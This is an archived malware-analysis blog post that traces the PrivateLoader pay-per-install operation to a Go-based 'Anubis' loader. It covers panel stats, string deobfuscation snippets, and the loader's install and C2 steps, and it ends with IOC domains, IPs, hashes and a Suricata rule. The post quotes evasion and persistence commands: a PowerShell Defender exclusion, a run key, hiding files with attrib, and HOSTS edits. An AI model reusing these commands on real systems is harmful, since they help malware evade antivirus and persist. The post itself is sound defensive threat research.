PrivateLoader to Anubis Loader By Jason Reaves Published: 2022-02-14 · Archived: 2026-04-06 00:35:07 UTC 6 min read Feb 14, 2022 By: Jason Reaves and Joshua Platt Press enter or click to view image in full size Intel471 released a report[1] on a loader system being leveraged for distribution of various crimeware malware families: Qbot SmokeLoader TrickBot NanoCore RAT Redline stealer njRat https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 1 of 17 Djvu ransomware Vidar stealer Remcos RAT Tofsee spambot QRat Lockbit ransomware Dridex DanaBot The diversity of the malware families led the Walmart Cyber Intel team to investigate further. Infrastructure Analysis The report mentioned an administrator panel located on the main command and control server. The panel is named “EZCubePanel” by the author. The configuration options are fairly straightforward as laid out in the intel471 offering. The panel is configured to deliver links and browser extensions. Press enter or click to view image in full size Links The browser extensions did appear to be suspended at the time but were likely utilized in previous campaigns. Press enter or click to view image in full size https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 2 of 17 Extensions While the AdminLTE open source bootstrap template has been implemented to streamline the UI process, the main functionality is implemented in php. Curiously, two geo tags appear to be linked to specific domains. The tag WW_5 is hard coded for ezsoftware[.]ru, while the tag WW_8 is linked to vip-space[.]com & vip-files[.]com Domains Installer The private loader installer makes some interesting requests. 941c7e39e8ea114465eadbd45aa709d55ad36ba551cbbf552e4c09b494a3a32d https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 3 of 17 After downloading a proxy list and contacting statistics.php, the payload link is encrypted with a simple xor routine and delivered to the client. >>> for i in range(len(b)):... b[i] ^= 0x1d...>>> bbytearray(b'URL:https://cdn.discordapp. com/atta Database Infection counts show a large loader based system, which mimics some of the data presented in the report by Intel471. Extension infection stats: Logger infection stats from deliveries: Loaders Loading Loaders https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 4 of 17 According to the report, “Privacy tools” domains were utilized as a primary delivery for SmokeLoader. After checking out a few of the domains, some interesting stats were discovered. In November of 2021, over a period of 20 days there were over 125K loads. For December 2021, roughly 82K for pab2 and pab3. Press enter or click to view image in full size https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 5 of 17 Stats The stat panel below appeared to show loads for the affiliate IDs pub1, pub2 and pub3. Nearly 33K loads in nine days. https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 6 of 17 Current Stats During our investigation we found other loaders delivered by PrivateLoader. Similar to what the report stated. However, during some of the loader executions, we observed traffic that did not appear to line up with the other stealers. https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 7 of 17 After further inspection of the ‘build_dl’ traffic, one of the uncovered loader samples was actually developed in GoLang. Get Jason Reaves’s stories in your inbox Join Medium for free to get updates from this writer. Remember me for faster sign in Upon execution, the sample performs a check to see if it has admin privileges by attempting to open \\PHYSICALDRIVE: https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 8 of 17 Next it takes a screenshot: And then proceeds to install itself: Some of the strings are obfuscated but the deobfuscation is simply subtracting one from every character: https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 9 of 17 def deobf(a): b = bytearray(a) for i in range(len(b)): b[i] -=1 return b So now we can easily map out the install process steps, the malware leverages powershell to setup some exclusion paths: powershell -Command Add-MpPreference -ExclusionPath on: AppData\Local\Temp AppData\Local\Microsoft Sets a runkey in Software\\Microsoft\\Windows\\CurrentVersion\\Run and the registry name and install name will be randomly generated from a hardcoded list of possibilities, install names: svchost csrss rundll32 winlogon smss taskhost unsecapp AdobeARM winsys jusched BCU wscntfy conhost csrss dwm sidebar ADService AppServices acrotray ctfmon lsass realsched spoolsv RTHDCPL RTDCPL MSASCui https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 10 of 17 For the registry names: Trion Softworks Mystic Entertainment Microsoft Partners Client-Server Runtime Subsystem Networking Service After then moving itself to the proper location it will use ‘attrib’ to set itself as a system file and hidden: attrib +S +H Along with altering the HOSTS file: (edited for brevity) And flushing the DNS cache: https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 11 of 17 ipconfig //flushdns After installation the bot will connect to the C2 either over HTTP or TCP and register itself by sending various information back to the C2 via TCP: md5(cmd /c whoami) + “->Reg->[“ + Datetime + ”]->” + + “->” + + “->” + + “->” + + “->” + Bot Build + https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 12 of 17 Bot registration For HTTP traffic an example can be seen below, the data sent to the server is obfuscated by adding two to every byte: POST /callback HTTP/1.1 Host: redacted.x.x.x User-Agent: Go-http-client/1.1 Content-Length: 57 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzipcallback=HktgYcnn%22Cffgf%22%2F%22lwuejgf®info=WugtMKV After registration, the bot will check for tasks to perform: https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 13 of 17 Task parsing Press enter or click to view image in full size Task Commands Panel The panel refers to itself as ‘ANUBIS PANEL’ and contains roughly 20K bots. The bots appeared to be leveraged for crypto mining and distributing other malware. Press enter or click to view image in full size https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 14 of 17 PPI stats By country: Country map for installs: https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 15 of 17 Install stat slice from January: https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 16 of 17 The stats clearly show Anubis operators have been delivering thousands of installs each week. In the case of Anubis, more than 500 unique binaries were distributed. The delivered tasks from Anubis also appear to similarly overlap with those of PrivateLoader. Over a period of 12 days, more than 11 GB of stealer logs were collected. While cracked software is often overlooked in the world of CyberCrime, it is clearly underestimated as a tactic. IOCs Privacy-tools-for-you-777[.]com 2.56.59[.]42 212.193.30[.]29 212.193.30[.]45 privacy-tools-for-you-782[.]com file-coin-host-12[.]com host-file-file0[.]com privacy-tools-for-you-781[.]com coin-file-file-19[.]com coin-coin-file-9[.]com file-file-host8[.]com data-host-coin-8[.]com file-file-host4[.]com host-data-coin-11[.]comAnubis Loader: 84b33d3b0c1e396758f9591e797f5b0029be3f6a752dc2bec2dc20a85d68adda b7e657155c23d71f732171d68764793bb6010d42da1f80eb4dc9a630aeae1307 4b5b660add37cd7a6d6a2444c3d410ed0de1c24e59c5e1d0091976bbc8099fef TCP traffic suricata rule: alert tcp $HOME_NET any -> $EXTERNAL_NET any ( msg:"Anubis Registration"; content:"|54 67 69 2f 40|" References 1: https://intel471.com/blog/privateloader-malware 2: https://www.fortinet.com/blog/threat-research/omicron-variant-lure-used-to-distribute-redline-stealer Source: https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e Page 17 of 17